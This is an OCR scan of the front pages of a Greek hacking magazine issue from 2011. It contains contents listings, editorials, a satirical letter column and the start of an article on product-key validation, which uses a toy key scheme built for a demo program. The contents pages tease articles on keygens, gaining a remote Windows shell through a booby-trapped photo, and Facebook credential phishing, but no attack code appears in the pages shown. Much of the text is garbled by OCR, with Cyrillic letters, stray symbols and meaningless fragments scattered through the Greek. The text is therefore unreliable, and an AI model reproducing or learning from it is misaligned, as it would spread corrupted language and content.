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Μάθετε πώς δημιουργούνται 
τα κλειδιά προστασίας και 
Φτιάξτε το δικό σας keygen 


£| Παρακολουθήστε πώς µερικές 
< αθώες φωτογραφίες καταλύουν 
περήφανα Windows boxes! 
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Κατασκευάστε ἑνα διαβολικό 


πληκτρολόγιο, κυρίως για πλάκα 5°. EEN Aes κ > AN 
αν αν Е 
Δείτε πώς ακριβώς μοιράζετε λος ο AT SK 


é τόυς росс 26 σας κωδικούς, ` о-да | 
Κωρέσικαν v το παίρνετε είδηση! “so ҸЕ. 


аќ « Ὃς πῶ" ъ Ἔα ` . м 
асг ç ч A ` 

See) τ΄ че. 

δ i NE 
R (*) каг πο λές Φορές 4 
һ ca ο f 
45 ~ Ἂς μες δεν χρειάζονται καν Віа ей 
ç д“ = o> i Э -- i ο. 
ὋΣ ο ον ο -.” 5.4 «αν =~ N 


πσοιςσχκόμσνα ο 


εντιτορια 


Malaysia truly Asia 


σνειλ НЕ! 


βγήκαν όλοι τώρα να πούνε τη γνώµη τους 


πως δημιουργούνται τα κλειόια προστασίας; 


g; πώς; (αναφερόμαστε о’ αυτά που 
ζητούν τα προγράμματα, φυσικά) 


tv-game µε ΤΟ arduino (μερος 1 ano 2 


αλήθεια σας λέμε: To arduino εἶναι hardware 
για να το ερωτευτείς ή/και για να φτιάξεις τα 
δικά σου παιχνιδάκια 


PF firewall: µπιγιοντ O€ PEAL οφ µπεισικς 


διαβάσατε το σχετικό άρθρο του deltaHacker 001 
και σκεφτήκατε ότι το ΡΕ είναι φοβερό; να δούμε 
πτώρα” τι θα σκεφτείτε! 


re(uni)verse it (Olly part II 


μιας και μάθατε τη λογική δημιουργίας κλειδιών για 
την προστασία προγραμμάτων, μήπως εἶναι ώρα να 
φτιάξετε το δικό σας keygen; 


σπασιµο VEUPWV — αλλά στα πιο απολαυστικἁ του! 


η κατασκευή ενός μικρού, διαβολικού 
πληκτρολογίου. αναλυτικά και βήμα προς 
βήμα, φυσικά 


µια εικονα, ΧΙ 


µια φανταστική ιστορία πρόσβασης 
στον υπολογιστή ενός Windows user, o 
οποίος ήθελε πολύ τις φωτογραφίες της 
χθεσινοβραδινής εξόδου 


Χωρις KEPHATOOEKTH (µερος 2 апо 2 


η κατασκευή του δικού µας arcade cabi- 
net δεν τελειώνει µε τη συναρμολόγηση 
του κουτιού και του υπολογιστή που 
περιλαμβάνει! 


προσοχη: ψαρεμα σε εξελιξη! 


@ e πώς γίνεται να δώσουμε σε τρίτους To email 
και το password µας στο Facebook, χωρίς 
καν να το πάρουμε εἴδηση 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 

Αρχισυντάκτης Παναγιώτης Βαρελάς 

Σύμβουλοι ἐκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 

Σύνταξη Παναγιώτης Βαρελάς, Χρήστος Βαρελάς, Ανδρέας 


Βενιέρης, Πώργος Πάννου, Μανώλης Κιαγιάς, 
Γιώργος Μελέκος, Νίκος Μουρατίδης, Αναστάσιος 
Στασινόπουλος, Χρίστος Τόμπρας 

Γραμματική επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


Το περιοδικό deltaHacker εἶναι συνδρομητικὀ και εκδίδεται апо την Parabing Creations 
δώδεκα φορὲς το χρόνο, στις αρχές κάθε μήνα. H Parabing Creations ἐχει την έδρα της 
στη Μαιώτιδος 3, 55 133, Καλαμαριά. H εκτύπωση και η βιβλιοδεσία γίνονται апо την 
ThessPrint Α.Ε. To email επικοινωνίας του περιοδικού εἶναι το talk2us@deltahacker.gr 
και το email για τις συνδρομὲς το subscriptions@deltahacker.gr. Οι πληροφορἰες για τις 
συνδρομὲς εἶναι στο http://deltahacker.gr/subscriptions και οι παραγγελἰες γίνονται апо 
το http://deltahacker.gr/order. Όλες οι απόψεις που εκφράζονται στα άρθρα δεν εκφρά- 


ζουν απαραίτητα και τη γνώμη του περιοδικού. 


(5) εἶναι 1/11/2011, έχουμε την ημερομηνία διεξαγωγής εκλογών, 
γνωρίζουμε και τα αποτέλεσµατα! !! 


save 


«ρε 


ser 


To deltaHacker είναι το μοναδικό στο χώρο των 
περιοδικών έντυπο που ασχολείται αποκλειστικά 
κι αληθινά µε τον κόσµο του ethical hacking, 
γυρίζοντας συστηµατικά την πλάτη του στον 
καθωσπρεπισµό κι αδιαφορώντας παντελώς για την 
ασφάλεια της θεωρίας. 


Το deltaHacker είναι τόσο σίγουρο για TOV εαυτό του 
και τόσο τίμιο κι ευθύ απέναντι στον αναγνώστη, 
που αντί να γυρνάει εδώ κι εκεί στα περίπτερα και ν΄ 
αγωνίζεται να φανεί ανάμεσα στις Σούπερ-Κατίνες 
και στα PC-something-bored, έρχεται κατευθείαν 
στο σπίτι σας - κι έρχεται για να σας κατακτήσει. 


Αν είστε από εκείνους που δεν βλέπουν τον 
υπολογιστή τους ως άλλη µια οικιακή συσκευή 
και δεν αντιμετωπίζετε το Internet ως ένα δίκτυο 
που αρχίζει και τελειώνει µε το Facebook και το 
Twitter, τότε είναι 102% βέβαιο ότι θ’ αγαπήσετε το 
deltaHacker, καθώς κι ότι θα θέλετε την παρέα του 


και τους 12 µήνες του χρόνου! 


Όλες OL πληροφορίες για όλα τα προγράµµατα 
συνδροµών είναι στο 


deltahacker.gr/subscriptions 


Παραγγείλετε τώρα µία από τις συμφέρουσες 
συνδρομές από το 


deltahacker.gr/order 


deltaHacker: Hacking for the rest of us. 
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Το σλόγκαν το ‘xa ακούσει για πρώτη фора το καλοκαῖρι του 2004, σε διαφήμιση στο CNN. 
Βρισκόμουν στο Βερολίνο, θυμάμαι, μαζὶ µε τον σηµερινὀ αρχισυντάκτη του deltaHacker. 
Τότε βἐβαια εκείνος ἦταν απλὸς συντάκτης κι εγὠ απλὸς αρχισυντάκτης, ενώ Eva περιοδικὀ 
σαν το deltaHacker δεν υπήρχε οὐτε καν ως μακρινή σκέψη. 


Πρὀσεξα, που λέτε, τη διαφήμιση Tou CNN, η опоіа προερχόταν апо το υπουργείο τουρισμού 
της Μαλαισίας και παρότρυνε τον κόσμο να επισκεφτεί τη χώρα γιατἰ, πώς να το κάνουμε, η 
Μαλαισία εἶναι αληθινἠ Ασία (http://bit.ly/mtasia). Ενδιαφέρον επιχείρημα, δεν λέω, αν και 
κάπως προφανὲς. Πάντως с’ εμένα ἐπιασε. Παρά το γεγονὸς бт! βρισκόμουν σε διακοπὲς, 
ἄρχισα να σκέφτομαι бт! υπάρχουν µέρη τα οποία εἶναι μᾶλλον απίθανο να επισκεφτώ. Όχι 
κατ’ ανάγκη επειδἠ εἶναι μακρινά. Απλά εἶναι µέρη που, пос να то κάνουμε, δεν σε βγάζει 
εὐκολα ο δρόμος σου... 


Ἔχω Ліста u” αυτά τα µέρη. Περιλαμβάνει το Τζούνο της Αλάσκας, το Χόμπαρτ της Τασµα- 
viag, την KoudAa Λουμπούρ της Μαλαισίας, το Σαντιάγκο της Χιλής και φυσικά το Ρέἐικιαβικ 
της Ισλανδίας (Εἰδατε; Δεν εἶναι όλα πολὺ μακρινὰ.) 


А, ναι. Na µην ξεχάσω και το Ανατολικὀ Τιμόρ. 


Το Ανατολικὀ Τιμόρ το ανέφερα και σ’ Eva ano τα live streams που κάνουμε για то περιοδι- 
KO, µέσω του UStream (ustream.tv/channel/deltahacker). O φίλος µου ο Τίμος γέλασε µε την 
ομοιότητα στα ονόματα. Αμέσως ο Thiseas δεν ἐχασε την ευκαιρἰα κι έδωσε link προς χάρτη 
της νοτιοανατολικἠς Ασίας, στην οποία βρίσκεται το Ανατολικό Τιμόρ. Και πολύ γρήγορα η 
συζήτηση ¿kave αυτὸ που πάντα της αρέσει να κάνει ката τη διάρκεια των live streams: 
ξέφυγε εντελώς. 


Πλάκα πλάκα μπορεῖ να µην пао ποτὲ στο Ανατολικό Τιμόρ, αλλά αν τύχει θα στείλουμε 
*kal* εκεἰ deltaHacker. Σκέφτομαι μάλιστα OT! OOO! γράφονται συνδρομητές στο περιοδικὀ 
και δίνουν διεύθυνση αποστολἠς στο Ανατολικό Τιμόρ, να τους δίνουμε δωρεάν συνδρομή. 


Πα πάντα. 


Ποιος ξέρει, µε τα πολλά ἰσως βρεθεἰ κάποιος εὖπορος Τιμορέζος (;) και µας κάνει τα εισιτή- 
рта για εκεί. Θυμάμαι τώρα бт! φίλος του περιοδικού πρὀτεινε πως, αν NOTE διοργανώσουµε 
συνέδριο χἀκινγκ, τότε θα πρέπει να το κάνουμε στο Ανατολικὀ Τιμόρ! 


Μερικοἰ ψάχνουν ευκαιρία για εξωτικἐς διακοπές, µου φαίνεται. 
Τους καταλαβαίνω απόλυτα. 


Τολμηρέὲς κι ολίγον τι φιλόδοξες οι σκέψεις για συνέδρια о’ εξωτικἀ µέρη. Αλλά µιας κι 
αναφἑρθηκα σε συνέδρια, να πω µε την ευκαιρία бт! οι ιδέες που µας στέλνετε κι αφορούν 
στο περιοδικὀ ἠ/και с’ ἄλλες δραστηριότητες γύρω апо το περιοδικὀ, εἶναι τουλάχιστον 
101% ενδιαφέρουσες. Μιλάμε για προτάσεις γύρω апо θἐµατα ἡ σειρὲς θεμάτων που θέλετε 
να διαβάσετε στο περιοδικὀ, το ρόλο του site (deltahacker.gr), τη θεματολογἱα των video cast 
(άντε να τα ξεκινάμε, σιγἁ σιγὰ!) алла και ιδέες για την προώθηση του ἰδιου του περιοδικού. 


Παρεμπιπτόντως, ὅσοι ανησυχείτε λίγο για τη δύσκολη ύλη του deltaHacker, πραγµατι- 
ка δεν υπάρχει λόγος. Αν пал ανησυχείτε για την περίπτωση που η ύλη παραείναι εὐκολη, 
επἰσης δεν υπάρχει λόγος. H θεματολογία του τεύχους 001 απέδειξε, νομίζω, ὁτι ἑνας ouv- 
δυασμὸς ἄρθρων nou θ’ απευθύνονται τόσο στους νεοφερμένους στο ҳоро боо και στους 
πιο προχωρημένους, εἶναι πράγματι εφικτὸς. Το ἰδιο θεωρώ ὁτι πετύχαμε και στο τεύχος που 
κρατάτε στα χέρια σας. Αλλά ας µην σας προκαταλαμβάνω. Al youiA Лт «γιου μπι δε τζατζ 
οβ δατ. 
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Τις τελευταίες βδομάδες αρκετοί φίλοι μᾶς ἑστειλαν κι άρθρα τους, να τα διαβάσουμε κι av µας 
αρέσουν και κἀνουν για το περιοδικὀ, να τα δημοσιεύσουμε κιόλας. Δεν ἐχουμε κάνει σχετικἠ, ENİ- 
onun ανακοίνωση nepi αυτού. Μας ἐχετε ὁμως ρωτήσει κάποιες φορὲς και μάλιστα с’ Eva апо τα live 
stream το επαναλάβαμε: Ναι, φυσικά και θα χαρούμε πολύ να διαβάσουμε ἀρθρα σας, γιατὶ ὀχι να та 
δημοσιεύσουμε κιόλας! Το εἰπαμε φωναχτά, που λέτε, και πράγματι µας στεἰλατε άρθρα. Ἠδη о’ αυτὀ 
το τεύχος δημοσιεύουμε άρθρο αναγνώστη, ο οποίος υπογράφει µε το ὀνομα Johnny Who. Δείχνει 
αναλυτικἁ κι επεξηγηµατικἀ пос κατάφερε va πάρει πλήρη πρὀσβαση στο Windows box ενός φίλου 
του, ο οποίος δεν βρισκόταν στο ἰδιο топіко δίκτυο p’ εκεἰνον και μάλιστα εἶχε τον υπολογιστή του 
προστατευμένο µε firewall, anti-virus κ.λπ. Συνδυάζοντας όμως γνώσεις και καταφεύγοντας σε TE- 
XVIKEG κοινωνικἠς μηχανικἠς, о Johnny Who κατάφερε να πάρει shell στο απομακρυσμένο box -- µε 
δικαιώματα administrator, φυσικά. 


Γκουντ σταφ, ὁπως λένε και οι φίλοι µας οι Αμερικάνοι. 


Σ’ AUTÒ το τεύχος κάνει το ντεμπούτο του κι ἄλλος ¿vag νέος συνεργάτης, о φίλος µας ο giannoug 
(@giannoug στο twitter, αν κάποια στιγµἠ θελήσετε να τον τρολάρετε). O giannoug εἶναι το κλασικὀ 
παράδειγµα νέου ανθρώπου µε NOAAN ὀρεξη για εξερεύνηση και μάθηση, ο οποίος δεν διστάζει να Bå- 
ζει σε εφαρμογἡ б,т! μαθαίνει ακόµη και για να στήνει φάρσες. Ναι. Σωστά το διαβάσατε. O giannoug 
συχνὰ ἐχει μεγάλα κέφια -- κι aàipovo αν οι ἄνθρωποι γύρω του δεν ἐχουν кал αἴσθηση του χιούμορ. 
Μια µικρή ιδέα για το τι εννοούμε θα πάρετε διαβάζοντας το άρθρο που αρχίζει апо τη σελἰδα 54. 


Πάντως ἐχω Eva παράπονο απ’ ὁλους τους συνεργάτες του περιοδικού, παλιούς και νέους аутара. 


$ Ελλάς Τείνω μάλιστα να πιστεύω ὁτι εἶναι συνεννοημένοι και Spouv βάσει σχεδίου. Όσο το σκἐφτοµαι, τόσο a% 
HOU Φαίνεται ως TO πιο πιθανό σενάριο. Θα σας πω την υποψία µου, να Hou πεἰτε κι εσεἰς τι πιστεύετε. 
Jiterranean Θεωρώ бт! ἐχουν βαλθεἰ va τρελάνουν *óoÀouç* εμάς, που µας αρέσουν Eva соро πράγματα γύρω апо 
την τεχνολογία γενικότερα και το χάκινγκ ειδικὀτερα. Με το που διαβάζουμε кат! και πωρωνόμαστε 
f κι αρχίζουμε να το ψάχνουμε παραπέρα, στην επὀµενη σελίδα υπάρχει Eva GAAO, av OXI περισσότερο 
Г τότε σίγουρα εξίσου ενδιαφἐρον άρθρο. Μα кала, δεν σέβονται καθόλου το χρόνο µας; Έλεος δεν 
уа EXOUV; 
\ Εγὠ ισχυρἱζομαι πως ὀχι, δεν xouv. 
/ ippine 
J Εσεἰς τι λέτε; Περάστε µια βόλτα апо Ta forum Tou site ἡ Tn fan page και μιλήστε ελεύθερα. Ekróç £e 
Chad κι αν δεν θέλετε να εκφραστεἰτε δημόσια, οπὀτε о’ αυτἠ την περίπτωση υπάρχει και TO email Tou πε- 
í ριοδικού: talk2us@deltahacker.gr 
С 
е" Калі ανάγνωση, калд διασκέδαση κι ὁ,τι θέλετε, ξέρετε: Εἱμαστε εδώ, κάπου κοντά σας, σχεδὀν 24/7! 
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Αγαπητοί pov, 

Από ὀ,τι βλέπετε, πάεν να pov Υίνεν συνήϑενο. 

H γραφομηχανή της κυρίας Καίτης εννοώ. ” 

Έχω βέβαια απὀ δίπλα καν το WD40 ytafi κολλάνε τα πλῆκτρα κάθε λίγο 
καν λιγάκι, ενδικά το Enter. 

Ανεβάζεν реу τη σελίδα pla γραμμή, αλλά δεν επιστρέφει στην αρχική 
θέση τον κύλινδρο, KaL αν δεν το προσέξω εγκαίρως καταλήγω να πατάω το 
ένα γράμμα πάνω στο άλλο, στο ἴδιο σηµείο. 

Λίγο фот µε το WD4G, βέβαια, και όλα επανέρχονται στην τάξη. 

Λουπόν, алб την τελευταία φορά που σας έγραφα έχουν συμβεί πολλά. 

Όχν, η Ἰρόνκα δεν έχεν ακόµα εκταμιεύσεν την έκτη δόση. Αυτό ακόµα 
δεν έχεν συμβεί. 

Πρώτο νέο, αν καν OXL το πιο σημαντικό, είναι OTL επέστρεφα стас Αθή- 
Vag. Ωραίο το Πόρτο Γερμενό, δεν λέω, αλλά κάποια στιγµή συνειδητοποίη- 
σα OTL όλα τα γύρω σπίτια είχαν αδειάσει, καν πήγε να µε πιάσει κάτι. 

Φταίεν βέβαια ότι έβρεχε καν OTL τα τζιτζίκια είχαν σταματήσει. 

Πήρα, λοιπόν, τη γραφομηχανή παραμάσχαλα, γέμισα το σακίδιο µε ὁ,τν 
ταπεράκια εἴχανε απομείνει στην πατάώνξζη, καν μπήκα στο πρώτο KIEA. 

Δεν ξέρω αν ήταν που είχα λείῴεν καιρό, αλλά µε το που έφτασα έξω από 
το σπίτι παρατήρησα δύο σημαντικές αλλαγές. 

E πρώτη ήταν η αλλαγή στο γενικότερο αστικό τοπίο, λόγω των βουνών 
µε τα σκουπίδια. 

Στο μυαλό pov, βλέπετε, τα βουνά µε τα σκουπίδια εἶναι συνυφασμένα µε 
το πνεύμα των Χριστουγέννων, κάτι σαν το δέντρο στην Πλατεία Συντάγμα- 
τος καν τις φωτεινές ενδείξεις των λεωφορείων καν τρόλεϊ, που αντί να σε 
πληροφορούν για τον αριθµό της γραμμῆς και τον προορισμό, σου εύχονταν 
«Χρόνια Πολλά». 

Όλα αυτά ανήκουν στα δεκεµβριανά ήθη και τα έθιμα της πατρίδας µας. 
Όχι στα οκτωβριανά. Πόθεν µας προέκυφαν σκουπίδια τον Οκτώβριο: Με το 
που τα είδα, θορυβήθηκα. Εξεπλάγην. Τι έπαθαν; Περίεργο. Peculiar που 
θα έλεγαν καν ον φίλου µας ον Άγγλον. 

To δεύτερο πράγμα που µε θορύβησε ήταν η ησυχία στους δρόμους. Δεν 
ήταν µόνο OTL κυκλοφορούσαν λιγότερα αυτοκίνητα, ήταν πως καν αυτά που 
κυκλοφορούσαν, πήγαιναν απαλά, πώς να το πω, ανάλαφρα, σαν να µην ήθε- 
λαν να τραβήξουν την προσοχή. 

Όπως τον δεκαπενταύγουστο ένα πράγμα. 

Λοιπόν, πλάκα πλάκα, αυτό µε προβλημάτισε πολύ. Εδώ γίνεται χαμός, 
στη χώρα εννοώ, καν δεν ακούγεται XLX. Οὔτε ένα κορνάρισµα, πον λέεν ο 
λόγος. 

Εντάξει, ακούς τα γνωστά συνθήματα στις πορείες, και τις γνωστές αε- 


Σνέιλ ELA 
ο ΩΑ 


ρολογίες στα παράθυρα της τηλεόρασης, αλλά απὀ τα παράθυρα των σπι- 
τνών δεν ακούγεται τσιμονδιά. 


Μου µοιάζεν σαν κάτι να ετοιμάζεται καν αυτό µε αγχώνεν πολύ. 


Τέλος πάντων, στο τραπέζι του σαλονιού βρήκα πολλά καν διάφορα, που 
μου είχαν αφήσει ον φίλτατοι συγγενείς, για va µε βοηθήσουν στη σύνταξη 
των επιστολών µου. 

Тоос είχα ενημερώσει, βέβανα, γνα τη νέα POV αυτή ενασχόληση, yratl 
έπρεπε να ζητήσω άδεια να φέρω ano το Πόρτο Γερμενό τη γραφομηχανή. 

«Επιστολές»» µε είχε ρωτήσει η μητέρα της εξαδέλφης που είναν Ἰνδονί- 
στρνα. «Ib επιστολές; Ποιος σου ζήτησε να γράφεις επιστολές»» 


«Δεν EXEL σημασία», της απάντησα ανυπόµονα. «Να τη φέρω τη γραφομη- 
χανή ἢ OXY» 

«Ер, φέρ' τηνε αφού τη θέλεις τόσο. Πρόσεχε µόνο να µη σου πέσεν τα- 
μπάσκο στα πλήκτρα καν τη χαλάσεις.» 

Ταμπάσχο1 Να τη χαλάσωΣ Έδωσα τόπο στην οργή, καν δεν απάντησα. 

Στο τραπέζν, λονπόν, τον σαλονιού, βρήκα διάφορα. Κατ' αρχάς βρήκα 
ένα αντίτυπο τον πρώτου τεύχους του έγχρυτον τούτου περιοδικού, Χλεν- 
OPEVO ακόµα στην ζελατίνα του. Oa το ανοίξω αργότερα. 


Βρήκα επίσης τα εξής: ένα τεύχος ενός περιοδικού για τον Ινδικό xiv- 
ματογράφο, µε μεγάλες φωτογραφίες καν μεγάλα γράμματα” κάτι επτυπώ- 
σεις από το WikiLeaks’ κάτι άρθρα από το ВВС για τη μη εξουσιοδοτημένη 
κυκλοφορία της βιογραφίας του Ἰζούλναν Ασσάνζ” δελτία τύπου και κείμενα 
για το ἀῑφον 49” νεκρολογίες καν επικρίσεις για τον Στηβ Ίζομπς' ένα 
άρθρο του Salon για την εἰσοδο του κόμματος των Πειρατών στην τοπική 
βουλή του Βερολίνου’ και pla εἴδηση για το λύκειο που θα πηγαίνεν από 
Οντώβριο ο Κιμ Χαν Σολ, εγγονός του Κιμ Γιονγκ Ià, του Ντήαρ Λήντερ της 
Βορείου Κορέας. 

Βρήκα, επίσης, καν τον φορητό υπολογιστή της εξαδέλφης, µε ένα πολ- 
λημένο χαρτάκι TOV µου έλεγε OTL αν θέλω μπορώ να τον χρησιμοποιήσω. 


Τώρα, εγώ δηλαδή δικό pov υπολογιστή δεν έχω: Τέλος πάντων. 
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су. LEYA 


VHAGKER 


NN 


Έχατσα στο τραπέζι, καν ξεκίνησα va ξεσκαρτάρω τις εκτυπώσεις. 


Λοιπόν, γνα την περίπτωση που αναρωτιόσασταν, о Kip Χαν Σολ θα ξεκυ- 
νήσεν, στα µέσα Οµτωβρίου, τα μαθήματά του στο παράρτημα του Κολλεγίου 
Γνουνάντεντ Γουώρλντ, στη Βοσνία. Στη Βοσνία, δε, θα πάει γιατί yla κά- 
πονο λόγο δεν τον δέχτηκαν στο παράρτημα tov ἰδιου Κολλεγίου, στο Χονγκ 
Коуүх. 


Хин... 

Ἠπίσηςῃ О Τζούλναν Ασσάνζ, αυτός καλέ, απὀ то WikiLeaks, φέρεται va 
ἔχεν θυμώσεν πολύ γιατί δημοσυεύσανε, λέει, τη βιογραφία τον χωρίς να του 
ζητήσουν την άδεια. 

Ενδιαφέρον, =; Να βλέπεις τον κύριο Ασσάνζ να µάχεταν για την ελευθε- 
pla της πληροφορίας όταν η εν λόγω πληροφορία αναφέρεται σε κάποιον 
άλλο, αλλά να θεωρεί OTL παραβιάζονταν τα ανθρώπινα δυκανώματα αν ανα- 
φέρεται στον ἴδιο. 


Peculiar. 

Καν µετά, το θέµα pe tov Ίζομπς. 

Συγχρονισμός, όμως, έτσι; Τη pra pépa να κυκλοφορεί το árov 49 καν 
την άλλη να μαθαίνουμε για το θάνατό του. 

Δεν θα πω πολλά. Δεν τρελαννόμουνα ποτέ µε τον Ίζομπς - καν την 
Apple, γενικώς, την αντυπαθώ. Αλλά ο άνθρωπος ταλαυπωρήθηχε, ας τον 
αφήσουμε τώρα να ξεκουραστεί. 

θα µου πείτε, δεν είναν ο πρώτος άνθρωπος που ταλαιπωριέταν, αλλά 
εντάξεν, give him а break. 

Byńxav όλον τώρα να πούνε τη γνώμη τους. 

Είναι απίστευτο TO τι λένε. Από την µια να βλέπεις την GxXPLTN αγνοπού- 
ηση του ανδρός («μεγαλοφυΐα», «genius", "μοναδικός", "ανυπέρβλητος", 
μπλα μπλα μπλα, μπλα pria μπλα pria), καν από την άλλη να διαβάζεις brá- 
φορους εξυπνάκηδες να βγαίνουν να τον επικρίνουν, σε προσωπικό επίπεδο, 
үа. οτιδήποτε, από τους μισθούς πείνας στην Kiva µέχρν το ᾠενδές νδεολό- 
γηµα του αυτοδημιούργητου επιχενρηµατία καν τις εγγενείς αντιφάσεις του 
καπιταλιστικού τρόπου παραγωγής. 


Nav. Καν үка. το ελληνικό χρέος αυτός φταίει. Και γνα την χρεοκοπία της 
Lehman Brothers. Και γνα την ασυνεννοησία Μέρκελ -- Σαρκοζί. Καν για 
την απόρριυφη της εγγραφής τον Κιμ Χαν Σολ στο Κολλέγιο Γιουνάντεντ Γου- 
ὠρλντ, στο Χονγκ Κονγκ. Και για το άιφον 49. Φυσικά. 

Pe παιδιά, yla κάντε λίγο κράτει. Tt σας έκανε ο άνθρωπος} Πέθανε. 
Ούτε σας έβρισε, ούτε σας γρατζούνισε το αυτοκίνητο. 

Αλλά το πράγμα είναν γενικότερο. Μου φαίνεται πραγματικά απίστευτο 
το πόσο εύκολο το βρίσκουν όλοι να έχουν γνώμη. Λιαβάζεις ένα άρθρο στο 
WTEPVET, οτιδήποτε, καν αν πας να ποντάξεις τα σχόλια θα τρελαθείς. Оло, 
«ξέρουν». Оло, «γνωρίζουν». Оло, «υπενθυμίζουν». Όλοι «κατακεραυνώνουν». 

Καν ξέρετε, µετά λέμε τν έχει το ёрро παν Φοφόάει. 

Αλλά ας σταματήσω εδώ γιατί θα µου ανέβει η πίεση καν µου EXEL πεν O 
γνατρός POV να το αποφεύγω. 

Ες αύρνον τα σπουδαία. 

Σας ασπάζομαν, 
θείος Ακάκυος 


YV HA@KER 


Ποια εἶναι η λογική της δημιουργίας κλειδιών 
προστασίας για τα προγράμματα; Πώς μπορείτε να 
φτιάξετε τον δικό σας key generator, για να βρίσκετε 
ἐγκυρα/αποδεκτά κλειδιά; [σελ. 12 ἃ 40] 


Βοήθεια! Το πληκτρολόγιο παίρνει πρωτοβουλίες κι ο 
χρήστης τρελαίνεται! [σελ. 54] 


u 
Πώς από µια απλή φωτογραφία naipvoupe πλήρη πρόσβαση 
о? ένα απομακρυσμένο Windows Ροχ;[σελ. 62] 


Πόσο εύκολο εἶναι να Φανερώνουμε στοιχεία 
λογαριασμών, χωρίς καν να το παίρνουμε εἴδηση; 
[σελ. 86] 


| `: ΣΤΟ αλα 


PS ΜΕΥ ΠΡΟΣΤΑΣΙΑΣ; 
| (E; Πο) 
доња г = а аа ы а a ` 
| | 
І | 
l l x 
l | 
| | 
| = 
— `4 
. ἕν. ооо .. 2. 


YV HAQKER 


ÁN 


Υπάρχουν πολλὲς μέθοδοι για то 


Your Product Key 


Your Product Key uniquely identifies your copy of Windows XP. 


κλείδωμα ενὸς προγράμματος. To 
αποτέλεσµα ὁμως για τον TEAI- 
KO χρήστη εἶναι σχεδὸν πάντα το 


ἰδιο: Χρειάζεται να πληκτρολογήσει 


The 25-character Product Key appears on the yellow sticker > ° i > 

I Lore S RE Eva σωστό κλειδὶ προκειμένου να 
μπορέσει να ξεκινήσει το (αγαπη- 

Type the Product Key below: 


HEvo του) npòypappa. Τι σημαίνει 
όμως «σωστό κλειδὶ»; Πολὺ апла, 
σημαίνει να εισαγάγει vav κωδικὀ 
που το πρὀγραμμα θα θεωρήσει От! 
εἶναι γνήσιος ἡ ἐγκυρος. Έναν Kw- 
δικὀ, δηλαδή, που ακολουθεί πολὺ 
συγκεκριμένους κανόνες παραγω- 
γής, οι οποίοι συχνὰ βρίσκονται 
αποθηκευμένοι στο ἴδιο το EKTEAE- 


Type the Product 
Key below... Πώς 
παράγονται άραγε 
αυτά τα κλειδιά; 
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oipo! Τα τελευταία χρόνια, βέβαια, 
µε την εξάπλωση Tou Internet και 
των γραμμῶν ADSL, οι κανόνες au- 
τοὶ βρίσκονται κάπου στο Διαδίκτυο, σε κἄποιον server, pE TOV οποὶο £ni- 
κοινωνεἰ το πρὀγραμμα για τον ἐλεγχο της γνησιότητας του κωδικού (ñ 
αλλιώς κλειδιού). Στη συνέχεια θα δούμε NWS ακριβώς φτιάχνονται όλα 
αυτά, χωρίς όμως να περιοριστούµε στη θεωρία! Θα γράψουμε κι Eva δικὀ 
μας πρὀγραμμα το οποίο θα προστατεύεται µε ἐλεγχο κλειδιού, Χρησιµο- 
ποιώντας τους δικούς µας κανόνες. Στη δικἠ µας υλοποίηση οι κανόνες 
παραγωγἠς των κλειδιὼν θα βρίσκονται μέσα στο πρὀγραμμὰ µας και, 
φυσικὰ, θα ελέγχονται an’ αυτό *xwpic* τη μεσολάβηση κάποιου server. 


Η μέθοδος 


H μέθοδος που θα παρουσιάσουμε θα στηρἰζεται στην παραγωγἠ κλει- 
διών της ακὀλουθης µορφής: 


ABCD-EFGH-IJKL-MNOP 
‘Eva κλειδί θα θεωρείται γνήσιο αν σέβεται τους παρακάτω εννιἁ κανόνες: 


1. Θα πρέπει να ἐχει μήκος 16 χαρακτήρες ακριβώς (οι παύλες δεν 
λαμβάνονται υπόψη) 


2. Пато χαρακτήρα στη θέση І θα πρέπει να ισχύειτο] = А + 1. Με 
алла λόγια, ο χαρακτήρας στη θέση І θα πρέπει να εἶναι ο επὀµε- 
voc (λεξικογραφικὰ) του χαρακτήρα στη θέση A. Πα παράδειγµα, 
αν A = <b> τότε] = «с». 


3. Πα To χαρακτήρα στη θέση J θα πρέπει να ισχύει TO J = В - 1. 
Δηλαδή, ο χαρακτήρας στην θέση J θα πρέπει va εἶναι ο προηγού- 
μενος (λεξικογραφικἁ) του χαρακτήρα στην θέση В. 


4. Па то χαρακτήρα στη θέση К θα πρέπει να ισχύειτοκ- С - 3. 
Apa, ο χαρακτήρας στη θέση K θα πρέπει να εἶναι ο 3ος προηγού- 
μενος χαρακτήρας απ΄ αυτόν που βρἰσκεται στη θέση С. 


5. Па To χαρακτήρα στη θέση L θα πρέπει va loxvel TOL = D + 5. 
Επομένως, ο χαρακτήρας στη θέση L θα πρέπει va ‘val ο 5ος επὀ- 
μενος χαρακτήρας an’ αυτόν που βρἰσκεται στη θέση D. 


6. Πα το χαρακτήρα στη θέση M θα πρέπει να ισχύει M = E. Μη ρω- 
τήσετε τι εννοούμε µε αυτό! Θα στεναχωρηθούμε πολύ ;) 


Πώς δημιουργούνται τα κλειδιά προστασίας; 
““Φ6Φ24424444444444444444444444444444444444444444444444444444444444444444344444344444444444144444144144144144144144144144144144144444444144447. 


7. Ομοίως, για το χαρακτήρα στη θέση N θα πρέπει να ισχύει N = H. 
8. Πα To χαρακτήρα στη θέση O θα πρέπει να ισχύει το O = G + 18. 
9. Пато χαρακτήρα στη θέση P θα πρέπει να ioxUEI TO P = A + 10. 


‘Eva κλειδὶ που ικανοποιεἰ τους παραπάνω κανόνες, θα μπορούσαμε va To 
φτιάξουμε εύκολα, ακόµα και µε το χέρι! Δείτε Eva παράδειγµα: 


abef-efgh-babk-ehyk 


Па εκείνους που ¿xouv KOAANHG µε τα µαθηµατικἀ, θα μπορούσαμε va 
βάλουμε ως άσκηση τον υπολογισμό του πλήθους των δυνατῶν κλειδιών 
που μπορούν να παραχθούν µε βάση τους παραπάνω κανὀνες. Σαν δεδο- 
μένο, ὅσοι ασχοληθείτε µε την άσκηση λάβετε υπόψη бт! το ρεπερτόριο 
των δυνατῶν γραμμάτων που μπορούν να χρησιμοποιηθούν! εἶναι όλοι οι 
χαρακτήρες του κώδικα ASCII. Μ΄ ἆλλα λόγια, σε κάθε θέση του κλειδιού 
µπορεί να βρἰσκεται οποιοσδήποτε апо τους 256 χαρακτήρες! Ξέρετε τι 
δείχνει αυτὸς ο αριθμός; Το пӧсо δυνατὸ εἶναι το κλειδὶ µας! Όσο ποιο 
